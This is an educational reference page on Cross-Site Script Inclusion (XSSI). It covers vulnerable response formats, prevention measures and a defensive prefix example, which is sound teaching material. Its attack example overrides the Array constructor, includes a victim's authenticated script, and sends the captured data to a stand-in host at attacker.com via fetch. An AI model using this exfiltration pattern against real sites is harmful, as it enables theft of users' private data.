Cross-Site Script Inclusion (XSSI)

Cross-Site Script Inclusion (XSSI) is a vulnerability where sensitive data returned by a web application in JavaScript format can be stolen by an attacker's site through script inclusion, bypassing Same-Origin Policy (SOP) restrictions.

How It Works

While SOP prevents reading responses from cross-origin requests, it allows including cross-origin scripts. If sensitive data is returned in executable JavaScript format (like JSONP or JavaScript variable assignments), attackers can include the script and access the data through the execution context.

Vulnerable Response Types

// Dynamic JavaScript with user data
var userData = {"email": "user@example.com", "balance": 1000};

// JSONP response
callback({"email": "user@example.com", "balance": 1000});

// JavaScript array
[{"id": 1, "secret": "abc"}, {"id": 2, "secret": "def"}]

Attack Example

<!-- Attacker's malicious page -->
<script>
// Override the global Array constructor to capture array literals as they are created.
// Note: only old browsers routed array literals through the overridable global Array;
// modern engines use the internal constructor, so this particular trick no longer fires.
var stolenData;
var oldArray = Array;
Array = function() {
  stolenData = arguments;
  return oldArray.apply(this, arguments);
};
</script>

<!-- Include victim's authenticated endpoint -->
<script src="https://victim.com/api/user/data.js"></script>

<script>
// stolenData now contains user's data
fetch('https://attacker.com/steal?data=' + JSON.stringify(stolenData));
</script>

Prevention

  • Use standard JSON with proper CORS headers
  • Prepend responses with )]}'\n to break direct script execution
  • Require non-GET requests for sensitive data
  • Include anti-CSRF tokens in requests
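Worked example of the prefix defence from the list above, added here as illustration (not code from the original page): the server emits sensitive JSON behind the `)]}'\n` prefix, the same-origin client strips it before parsing, and a helper shows that the prefixed body is a syntax error when consumed as a whole script, which is exactly what an attacker's `<script src>` inclusion does. `buildProtectedResponse`, `parseProtectedBody` and `failsAsScript` are hypothetical names chosen for this example.

```javascript
// Added example (hypothetical helpers, not from the original page): anti-XSSI prefix.
const XSSI_PREFIX = ")]}'\n";

// Server side: wrap sensitive data so the body cannot run as an included script.
// A plain JSON content type plus nosniff also stops the browser treating it as JS.
function buildProtectedResponse(data) {
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: XSSI_PREFIX + JSON.stringify(data),
  };
}

// Same-origin client: the legitimate consumer removes the prefix before JSON.parse.
function parseProtectedBody(body) {
  if (!body.startsWith(XSSI_PREFIX)) {
    throw new Error("response is missing the anti-XSSI prefix");
  }
  return JSON.parse(body.slice(XSSI_PREFIX.length));
}

// Simulates script inclusion: a <script src> must parse the whole body as JS.
// Returns true when the body is rejected with a SyntaxError before anything executes.
// The body is only parsed here, never run.
function failsAsScript(body) {
  try {
    new Function(body);
    return false;
  } catch (e) {
    return e instanceof SyntaxError;
  }
}

// Constructed sample data mirroring the page's vulnerable response types.
const sample = { email: "user@example.com", balance: 1000 };
const protectedResponse = buildProtectedResponse(sample);
console.log(failsAsScript(protectedResponse.body));                   // true: inclusion fails
console.log(failsAsScript('var userData = ' + JSON.stringify(sample))); // false: readable via XSSI
console.log(parseProtectedBody(protectedResponse.body).balance);      // 1000
```

The unprefixed variable assignment and the bare JSON array from the page both parse as valid scripts, which is why they are exposed; only the prefixed body is rejected.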

See Also